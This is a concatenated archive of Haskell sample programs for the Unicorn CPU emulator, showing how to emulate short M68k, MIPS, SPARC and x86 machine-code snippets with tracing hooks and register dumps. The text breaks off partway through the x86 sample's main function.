unicorn-2.1.1/bindings/haskell/samples/SampleM68k.hs000066400000000000000000000107531467524106700223210ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate m68k code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.M68k as M68k import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- movq #-19, %d3 m68kCode :: BS.ByteString m68kCode = BS.pack [0x76, 0xed] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testM68k :: IO () testM68k = do putStrLn "Emulate M68K code" result <- runEmulator $ do -- Initialize emulator in M68K mode uc <- open ArchM68k [ModeBigEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address m68kCode -- Initialize machine registers regWrite uc M68k.D0 0x0000 regWrite uc M68k.D1 0x0000 regWrite uc M68k.D2 0x0000 regWrite uc M68k.D3 0x0000 regWrite uc M68k.D4 0x0000 regWrite uc M68k.D5 0x0000 regWrite uc M68k.D6 0x0000 regWrite uc M68k.D7 0x0000 regWrite uc M68k.A0 0x0000 regWrite uc M68k.A1 0x0000 regWrite uc M68k.A2 0x0000 regWrite uc M68k.A3 0x0000 regWrite uc M68k.A4 0x0000 regWrite uc M68k.A5 0x0000 regWrite uc M68k.A6 0x0000 regWrite uc M68k.A7 0x0000 regWrite uc M68k.Pc 0x0000 regWrite uc M68k.Sr 0x0000 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instruction codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength m68kCode start uc address (address + codeLen) Nothing Nothing -- Return the results d0 <- regRead uc M68k.D0 d1 <- regRead uc M68k.D1 d2 <- regRead uc M68k.D2 d3 <- regRead uc M68k.D3 d4 <- regRead uc M68k.D4 d5 <- regRead uc M68k.D5 d6 <- regRead uc M68k.D6 d7 <- regRead uc M68k.D7 a0 <- regRead uc M68k.A0 a1 <- regRead uc M68k.A1 a2 <- regRead uc M68k.A2 a3 <- regRead uc M68k.A3 a4 <- regRead uc M68k.A4 a5 <- regRead uc M68k.A5 a6 <- regRead uc M68k.A6 a7 <- regRead uc M68k.A7 pc <- regRead uc M68k.Pc sr <- regRead uc M68k.Sr return (d0, d1, d2, d3, d4, d5, d6, d7, a0, a1, a2, a3, a4, a5, a6, a7, pc, sr) case result of Right (d0, d1, d2, d3, d4, d5, d6, d7, a0, a1, a2, a3, a4, a5, a6, a7, pc, sr) -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> A0 = 0x" ++ showHex a0 ++ "\t\t>>> D0 = 0x" ++ showHex d0 putStrLn $ ">>> A1 = 0x" ++ showHex a1 ++ "\t\t>>> D1 = 0x" ++ showHex d1 putStrLn $ ">>> A2 = 0x" ++ showHex a2 ++ "\t\t>>> D2 = 0x" ++ showHex d2 putStrLn $ ">>> A3 = 0x" ++ showHex a3 ++ "\t\t>>> D3 = 0x" ++ showHex d3 putStrLn $ ">>> A4 = 0x" ++ showHex a4 ++ "\t\t>>> D4 = 0x" ++ showHex d4 putStrLn $ ">>> A5 = 0x" ++ showHex a5 ++ "\t\t>>> D5 = 0x" ++ showHex d5 putStrLn $ ">>> A6 = 0x" ++ showHex a6 ++ "\t\t>>> D6 = 0x" ++ showHex d6 putStrLn $ ">>> A7 = 0x" ++ showHex a7 ++ "\t\t>>> D7 = 0x" ++ showHex d7 putStrLn $ ">>> PC = 0x" ++ showHex pc putStrLn $ ">>> SR = 0x" ++ showHex sr Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = testM68k unicorn-2.1.1/bindings/haskell/samples/SampleMips.hs000066400000000000000000000075461467524106700225120ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate Mips code (big endian) import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Mips as Mips import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- ori $at, $at, 0x3456 mipsCodeEb :: BS.ByteString mipsCodeEb = BS.pack [0x34, 0x21, 0x34, 0x56] -- ori $at, $at, 0x3456 mipsCodeEl :: BS.ByteString mipsCodeEl = BS.pack [0x56, 0x34, 0x21, 0x34] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testMipsEb :: IO () testMipsEb = do putStrLn "Emulate MIPS code (big-endian)" result <- runEmulator $ do -- Initialize emulator in MIPS mode uc <- open ArchMips [ModeMips32, ModeBigEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address mipsCodeEb -- Initialise machine registers regWrite uc Mips.Reg1 0x6789 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength mipsCodeEb start uc address (address + codeLen) Nothing Nothing -- Return the results r1 <- regRead uc Mips.Reg1 return r1 case result of Right r1 -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> R1 = 0x" ++ showHex r1 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" testMipsEl :: IO () testMipsEl = do putStrLn "===========================" putStrLn "Emulate MIPS code (little-endian)" result <- runEmulator $ do -- Initialize emulator in MIPS mode uc <- open ArchMips [ModeMips32, ModeLittleEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address mipsCodeEl -- Initialize machine registers regWrite uc Mips.Reg1 0x6789 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength mipsCodeEl start uc address (address + codeLen) Nothing Nothing -- Return the results r1 <- regRead uc Mips.Reg1 return r1 case result of Right r1 -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> R1 = 0x" ++ showHex r1 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = do testMipsEb testMipsEl unicorn-2.1.1/bindings/haskell/samples/SampleSparc.hs000066400000000000000000000046071467524106700226450ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate Sparc code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Sparc as Sparc import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- add %g1, %g2, %g3 sparcCode :: BS.ByteString sparcCode = BS.pack [0x86, 0x00, 0x40, 0x02] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testSparc :: IO () testSparc = do putStrLn "Emulate SPARC code" result <- runEmulator $ do -- Initialize emulator in Sparc mode uc <- open ArchSparc [ModeSparc32, ModeBigEndian] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address sparcCode -- Initialize machine registers regWrite uc Sparc.G1 0x1230 regWrite uc Sparc.G2 0x6789 regWrite uc Sparc.G3 0x5555 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions with customized callback codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength sparcCode start uc address (address + codeLen) Nothing Nothing -- Return results g3 <- regRead uc Sparc.G3 return g3 case result of Right g3 -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> G3 = 0x" ++ showHex g3 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = testSparc unicorn-2.1.1/bindings/haskell/samples/SampleX86.hs000066400000000000000000000607511467524106700221640ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate X86 code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.X86 as X86 import Control.Monad.Trans.Class (lift) import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) import System.Environment -- Code to be emulated -- -- inc ecx; dec edx x86Code32 :: BS.ByteString x86Code32 = BS.pack [0x41, 0x4a] -- jmp 4; nop; nop; nop; nop; nop; nop x86Code32Jump :: BS.ByteString x86Code32Jump = BS.pack [0xeb, 0x02, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90] -- inc ecx; dec edx; jmp self-loop x86Code32Loop :: BS.ByteString x86Code32Loop = BS.pack [0x41, 0x4a, 0xeb, 0xfe] -- mov [0xaaaaaaaa], ecx; inc ecx; dec edx x86Code32MemWrite :: BS.ByteString x86Code32MemWrite = BS.pack [0x89, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] -- mov ecx, [0xaaaaaaaa]; inc ecx; dec edx x86Code32MemRead :: BS.ByteString x86Code32MemRead = BS.pack [0x8b, 0x0d, 0xaa, 0xaa, 0xaa, 0xaa, 0x41, 0x4a] -- jmp ouside; inc ecx; dec edx x86Code32JmpInvalid :: BS.ByteString x86Code32JmpInvalid = BS.pack [0xe9, 0xe9, 0xee, 0xee, 0xee, 0x41, 0x4a] -- inc ecx; in al, 0x3f; dec edx; out 0x46, al; inc ebx x86Code32InOut :: BS.ByteString x86Code32InOut = BS.pack [0x41, 0xe4, 0x3f, 0x4a, 0xe6, 0x46, 0x43] -- inc eax x86Code32Inc :: BS.ByteString x86Code32Inc = BS.pack [0x40] x86Code64 :: BS.ByteString x86Code64 = BS.pack [0x41, 0xbc, 0x3b, 0xb0, 0x28, 0x2a, 0x49, 0x0f, 0xc9, 0x90, 0x4d, 0x0f, 0xad, 0xcf, 0x49, 0x87, 0xfd, 0x90, 0x48, 0x81, 0xd2, 0x8a, 0xce, 0x77, 0x35, 0x48, 0xf7, 0xd9, 0x4d, 0x29, 0xf4, 0x49, 0x81, 0xc9, 0xf6, 0x8a, 0xc6, 0x53, 0x4d, 0x87, 0xed, 0x48, 0x0f, 0xad, 0xd2, 0x49, 0xf7, 0xd4, 0x48, 0xf7, 0xe1, 0x4d, 0x19, 0xc5, 0x4d, 0x89, 0xc5, 0x48, 0xf7, 0xd6, 0x41, 0xb8, 0x4f, 0x8d, 0x6b, 0x59, 0x4d, 0x87, 0xd0, 0x68, 0x6a, 0x1e, 0x09, 0x3c, 0x59] -- add byte ptr [bx + si], al x86Code16 :: BS.ByteString x86Code16 = BS.pack [0x00, 0x00] -- SYSCALL x86Code64Syscall :: BS.ByteString x86Code64Syscall = BS.pack [0x0f, 0x05] -- Memory address where emulation starts address :: Word64 address = 0x1000000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex i = N.showHex (fromIntegral i :: Word64) "" -- Pretty-print byte string as hex showHexBS :: BS.ByteString -> String showHexBS = concatMap (flip N.showHex "") . reverse . BS.unpack -- Write a string (with a newline character) to standard output in the emulator emuPutStrLn :: String -> Emulator () emuPutStrLn = lift . putStrLn -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length -- Callback for tracing basic blocks hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) -- Callback for tracing instruction hookCode :: CodeHook () hookCode uc addr size _ = do runEmulator $ do emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ maybe "0" showHex size eflags <- regRead uc X86.Eflags emuPutStrLn $ ">>> --- EFLAGS is 0x" ++ showHex eflags return () -- Callback for tracing instruction hookCode64 :: CodeHook () hookCode64 uc addr size _ = do runEmulator $ do rip <- regRead uc X86.Rip emuPutStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) emuPutStrLn $ ">>> RIP is 0x" ++ showHex rip return () -- Callback for tracing memory access (READ or WRITE) hookMemInvalid :: MemoryEventHook () hookMemInvalid uc MemWriteUnmapped addr size (Just value) _ = do runEmulator $ do emuPutStrLn $ ">>> Missing memory is being WRITE at 0x" ++ showHex addr ++ ", data size = " ++ show size ++ ", data value = 0x" ++ showHex value memMap uc 0xaaaa0000 (2 * 1024 * 1024) [ProtAll] return True hookMemInvalid _ _ _ _ _ _ = return False hookMem64 :: MemoryHook () hookMem64 _ MemRead addr size _ _ = putStrLn $ ">>> Memory is being READ at 0x" ++ showHex addr ++ ", data size = " ++ show size hookMem64 _ MemWrite addr size (Just value) _ = putStrLn $ ">>> Memory is being WRITE at 0x" ++ showHex addr ++ ", data size = " ++ show size ++ ", data value = 0x" ++ showHex value -- Callback for IN instruction (X86) -- This returns the data read from the port hookIn :: InHook () hookIn uc port size _ = do result <- runEmulator $ do eip <- regRead uc X86.Eip emuPutStrLn $ "--- reading from port 0x" ++ showHex port ++ ", size: " ++ show size ++ ", address: 0x" ++ showHex eip case size of -- Read 1 byte to AL 1 -> return 0xf1 -- Read 2 byte to AX 2 -> return 0xf2 -- Read 4 byte to EAX 4 -> return 0xf4 -- Should never reach this _ -> return 0 case result of Right r -> return r Left _ -> return 0 -- Callback for OUT instruction (X86) hookOut :: OutHook () hookOut uc port size value _ = do runEmulator $ do eip <- regRead uc X86.Eip emuPutStrLn $ "--- writing to port 0x" ++ showHex port ++ ", size: " ++ show size ++ ", value: 0x" ++ showHex value ++ ", address: 0x" ++ showHex eip -- Confirm that value is indeed the value of AL/AX/EAX case size of 1 -> do tmp <- regRead uc X86.Al emuPutStrLn $ "--- register value = 0x" ++ showHex tmp 2 -> do tmp <- regRead uc X86.Ax emuPutStrLn $ "--- register value = 0x" ++ showHex tmp 4 -> do tmp <- regRead uc X86.Eax emuPutStrLn $ "--- register value = 0x" ++ showHex tmp -- Should never reach this _ -> return () return () -- Callback for SYSCALL instruction (X86) hookSyscall :: SyscallHook () hookSyscall uc _ = do runEmulator $ do rax <- regRead uc X86.Rax if rax == 0x100 then regWrite uc X86.Rax 0x200 else emuPutStrLn $ "ERROR: was not expecting rax=0x" ++ showHex rax ++ " in syscall" return () testI386 :: IO () testI386 = do putStrLn "Emulate i386 code" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32 -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instruction by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32 start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx -- Read from memory tmp <- memRead uc address 4 emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex address ++ "] = 0x" ++ showHexBS tmp case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testI386Jump :: IO () testI386Jump = do putStrLn "===================================" putStrLn "Emulate i386 code with jump" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32Jump -- Tracing 1 basic block with customized callback blockHookAdd uc hookBlock () address address -- Tracing 1 instruction at address codeHookAdd uc hookCode () address address -- Emulate machine code ininfinite time let codeLen = codeLength x86Code32Jump start uc address (address + codeLen) Nothing Nothing emuPutStrLn ">>> Emulation done. Below is the CPU context" case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that loop forever testI386Loop :: IO () testI386Loop = do putStrLn "===================================" putStrLn "Emulate i386 code that loop forever" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated in memory memWrite uc address x86Code32Loop -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Emulate machine code in 2 seconds, so we can quit even if the code -- loops let codeLen = codeLength x86Code32Loop start uc address (address + codeLen) (Just $ 2 * 1000000) Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that read invalid memory testI386InvalidMemRead :: IO () testI386InvalidMemRead = do putStrLn "===================================" putStrLn "Emulate i386 code that read from invalid memory" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32MemRead -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic block with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions by having @beegin > @end codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32MemRead start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that write invalid memory testI386InvalidMemWrite :: IO () testI386InvalidMemWrite = do putStrLn "===================================" putStrLn "Emulate i386 code that write to invalid memory" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32MemWrite -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instruction by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Intercept invalid memory events memoryEventHookAdd uc HookMemReadUnmapped hookMemInvalid () 1 0 memoryEventHookAdd uc HookMemWriteUnmapped hookMemInvalid () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32MemWrite start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx -- Read from memory tmp <- memRead uc 0xaaaaaaaa 4 emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xaaaaaaaa ++ "] = 0x" ++ showHexBS tmp tmp <- memRead uc 0xffffffaa 4 emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xffffffaa ++ "] = 0x" ++ showHexBS tmp case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that jump to invalid memory testI386JumpInvalid :: IO () testI386JumpInvalid = do putStrLn "===================================" putStrLn "Emulate i386 code that jumps to invalid memory" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32JmpInvalid -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32JmpInvalid start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testI386InOut :: IO () testI386InOut = do putStrLn "===================================" putStrLn "Emulate i386 code with IN/OUT instructions" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32InOut -- Initialize machine registers regWrite uc X86.Eax 0x1234 regWrite uc X86.Ecx 0x6789 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions codeHookAdd uc hookCode () 1 0 -- uc IN instruction inHookAdd uc hookIn () 1 0 -- uc OUT instruction outHookAdd uc hookOut () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32InOut start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax ecx <- regRead uc X86.Ecx emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code and save/restore the CPU context testI386ContextSave :: IO () testI386ContextSave = do putStrLn "===================================" putStrLn "Save/restore CPU context in opaque blob" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 8KB memory for this emulation memMap uc address (8 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32Inc -- Initialize machine registers regWrite uc X86.Eax 0x1 -- Emulate machine code in infinite time emuPutStrLn ">>> Running emulation for the first time" let codeLen = codeLength x86Code32Inc start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax -- Allocate and save the CPU context emuPutStrLn ">>> Saving CPU context" context <- contextAllocate uc contextSave uc context -- Emulate machine code again emuPutStrLn ">>> Running emulation for the second time" start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax -- Restore CPU context contextRestore uc context -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testX8664 :: IO () testX8664 = do putStrLn "Emulate x86_64 code" result <- runEmulator $ do -- Initialize emualator in X86-64bit mode uc <- open ArchX86 [Mode64] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code64 -- Initialize machine registers regWrite uc X86.Rsp (fromIntegral address + 0x200000) regWrite uc X86.Rax 0x71f3029efd49d41d regWrite uc X86.Rbx 0xd87b45277f133ddb regWrite uc X86.Rcx 0xab40d1ffd8afc461 regWrite uc X86.Rdx 0x919317b4a733f01 regWrite uc X86.Rsi 0x4c24e753a17ea358 regWrite uc X86.Rdi 0xe509a57d2571ce96 regWrite uc X86.R8 0xea5b108cc2b9ab1f regWrite uc X86.R9 0x19ec097c8eb618c1 regWrite uc X86.R10 0xec45774f00c5f682 regWrite uc X86.R11 0xe17e9dbec8c074aa regWrite uc X86.R12 0x80f86a8dc0f6d457 regWrite uc X86.R13 0x48288ca5671c5492 regWrite uc X86.R14 0x595f72f6e4017f6e regWrite uc X86.R15 0x1efd97aea331cccc -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions in the range [address, address+20] codeHookAdd uc hookCode64 () address (address + 20) -- Tracing all memory WRITE access (with @begin > @end) memoryHookAdd uc HookMemWrite hookMem64 () 1 0 -- Tracing all memory READ access (with @begin > @end) memoryHookAdd uc HookMemRead hookMem64 () 1 0 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength x86Code64 start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" rax <- regRead uc X86.Rax rbx <- regRead uc X86.Rbx rcx <- regRead uc X86.Rcx rdx <- regRead uc X86.Rdx rsi <- regRead uc X86.Rsi rdi <- regRead uc X86.Rdi r8 <- regRead uc X86.R8 r9 <- regRead uc X86.R9 r10 <- regRead uc X86.R10 r11 <- regRead uc X86.R11 r12 <- regRead uc X86.R12 r13 <- regRead uc X86.R13 r14 <- regRead uc X86.R14 r15 <- regRead uc X86.R15 emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax emuPutStrLn $ ">>> RBX = 0x" ++ showHex rbx emuPutStrLn $ ">>> RCX = 0x" ++ showHex rcx emuPutStrLn $ ">>> RDX = 0x" ++ showHex rdx emuPutStrLn $ ">>> RSI = 0x" ++ showHex rsi emuPutStrLn $ ">>> RDI = 0x" ++ showHex rdi emuPutStrLn $ ">>> R8 = 0x" ++ showHex r8 emuPutStrLn $ ">>> R9 = 0x" ++ showHex r9 emuPutStrLn $ ">>> R10 = 0x" ++ showHex r10 emuPutStrLn $ ">>> R11 = 0x" ++ showHex r11 emuPutStrLn $ ">>> R12 = 0x" ++ showHex r12 emuPutStrLn $ ">>> R13 = 0x" ++ showHex r13 emuPutStrLn $ ">>> R14 = 0x" ++ showHex r14 emuPutStrLn $ ">>> R15 = 0x" ++ showHex r15 case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testX8664Syscall :: IO () testX8664Syscall = do putStrLn "===================================" putStrLn "Emulate x86_64 code with 'syscall' instruction" result <- runEmulator $ do -- Initialize emulator in X86-64bit mode uc <- open ArchX86 [Mode64] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code64Syscall -- Hook interrupts for syscall syscallHookAdd uc hookSyscall () 1 0 -- Initialize machine registers regWrite uc X86.Rax 0x100 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all code let codeLen = codeLength x86Code64Syscall start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" rax <- regRead uc X86.Rax emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testX8616 :: IO () testX8616 = do putStrLn "Emulate x86 16-bit code" result <- runEmulator $ do -- Initialize emulator in X86-16bit mode uc <- open ArchX86 [Mode16] -- Map 8KB memory for this emulation memMap uc 0 (8 * 1024) [ProtAll] -- Write machine code to be emulated in memory memWrite uc 0 x86Code16 -- Initialize machine registers regWrite uc X86.Eax 7 regWrite uc X86.Ebx 5 regWrite uc X86.Esi 6 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength x86Code16 start uc 0 codeLen Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" -- Read from memory tmp <- memRead uc 11 1 emuPutStrLn $ ">>> Read 1 bytes from [0x" ++ showHex 11 ++ "] = 0x" ++ showHexBS tmp case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err main :: IO () main = do progName <- getProgName args <- getArgs case args of ["-32"] -> do testI386 testI386InOut testI386ContextSave testI386Jump 